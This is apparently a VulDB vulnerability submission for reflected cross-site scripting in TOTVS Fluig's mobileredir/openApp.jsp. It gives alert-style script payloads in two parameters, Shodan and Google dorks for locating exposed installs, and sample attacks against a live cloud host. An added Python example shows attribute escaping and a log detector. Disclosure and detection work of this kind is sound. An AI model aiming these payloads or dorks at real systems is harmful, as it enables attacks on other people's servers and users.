| Title | TOTVS Fluig Platform 1.6.X - 1.8.1 Cross-Site Scripting |
|---|---|
| Description | TOTVS Fluig Platform 1.6.X - 1.8.1 - Cross-Site Scripting (full text follows) |

The TOTVS Fluig platform, in its versions from 1.6.1.X to 1.8.1, is vulnerable to Cross-Site Scripting in the 'redirectUrl' and 'user' parameters within the 'mobileredir' module.
Fluig is the productivity and collaboration platform that integrates with the ERP system, developed by Brazil's largest technology company, TOTVS, and hosted on the client's server.
Versions affected:
--
Fluig 1.6.X - Fluig 1.8.1
…
Attack Vector
https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl=
https://fluig.host.com/mobileredir/openApp.jsp?user=
Payloads:
https://fluig.host.com/mobileredir/openApp.jsp?redirectUrl="><script>alert(document.domain)</script>
https://fluig.host.com/mobileredir/openApp.jsp?user="><script>alert(document.domain)</script>
Dorks
Shodan:
https://www.shodan.io/search?query=fluig1
Google Dork:
inurl:"/portal/home" intitle:"Fluig"
intitle:fluig
Examples using a system hosted on TOTVS's Fluig cloud:
https://mobile.fluig.com/mobileredir/openApp.jsp?redirectUrl="><script>alert(document.domain)</script>
https://mobile.fluig.com/mobileredir/openApp.jsp?user="><script>alert(document.domain)</script>
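As an added illustration (not part of this submission, VulDB, or TOTVS's own code), the Python below shows the two sides of this finding a defender needs: why reflecting a query parameter into an HTML attribute without encoding lets the quoted payloads break out of the attribute, how attribute encoding closes that, and a small detector that flags requests to `/mobileredir/openApp.jsp` whose `redirectUrl` or `user` values carry markup. The page template, the Common Log Format lines and the IP addresses are constructed assumptions for the example.

```python
"""Added example: reflected XSS in an attribute, its hardened form, and a
log-based detector for the two parameters named in the advisory.

Assumptions (not from the page or TOTVS): the page reflects the parameter
into an href attribute, logs are in Common Log Format, sample lines below
are constructed.
"""
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

WATCHED_PATH = "/mobileredir/openApp.jsp"
WATCHED_PARAMS = ("redirectUrl", "user")


def render_unsafe(redirect_url: str) -> str:
    # Hypothetical vulnerable rendering: raw concatenation, so a value that
    # starts with "> closes the attribute and the tag and injects markup.
    return f'<a href="{redirect_url}">Open app</a>'


def render_safe(redirect_url: str) -> str:
    # html.escape(quote=True) encodes & < > " ' so the value can neither
    # terminate the attribute nor start a new element.
    return f'<a href="{html.escape(redirect_url, quote=True)}">Open app</a>'


# Markers of an attribute break-out or injected element: an opening tag,
# a quote followed by >, an on*= handler, or a javascript: URL.
_MARKUP = re.compile(r'(<\s*/?\s*[a-z]|"\s*>|\bon[a-z]+\s*=|javascript:)', re.I)


def suspicious_params(request_target: str) -> list[str]:
    """Return the watched parameters whose values contain markup."""
    parts = urlsplit(request_target)
    if parts.path != WATCHED_PATH:
        return []
    qs = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    for name in WATCHED_PARAMS:
        for value in qs.get(name, []):
            # Decode twice: payloads are often sent double-encoded.
            if _MARKUP.search(unquote(unquote(value))):
                hits.append(name)
                break
    return hits


# Constructed access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2023:00:57:01 +0000] "GET /mobileredir/openApp.jsp?redirectUrl=fluig://home HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/Nov/2023:00:58:14 +0000] "GET /mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 640',
    '10.0.0.9 - - [11/Nov/2023:00:58:20 +0000] "GET /mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 630',
    '10.0.0.7 - - [11/Nov/2023:00:59:00 +0000] "GET /portal/home HTTP/1.1" 200 8192',
]

_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_log(lines) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, timestamp, flagged params) per suspicious request."""
    findings = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        params = suspicious_params(m.group("target"))
        if params:
            findings.append((m.group("ip"), m.group("ts"), params))
    return findings


if __name__ == "__main__":
    payload = '"><script>alert(document.domain)</script>'
    print(render_unsafe(payload))  # attribute closed, script element injected
    print(render_safe(payload))    # payload rendered inert as text
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The detector keys on the path and parameter names from the advisory rather than on one payload string, so it also catches encoded and case-varied attempts against the same two parameters; the rendering pair shows that the fix is output encoding at the point of reflection, not input filtering.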

| User | erickfernandox (UID 57733) |
|---|---|
| Submitted | 2023-11-11 12:57 AM (2 years ago) |
| Moderation | 2023-11-24 08:40 AM (13 days later) |
| Status | Accepted |
| VulDB entry | 246104 [TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1 mobileredir /mobileredir/openApp.jsp redirectUrl/user cross site scripting] |
| Points | 17 |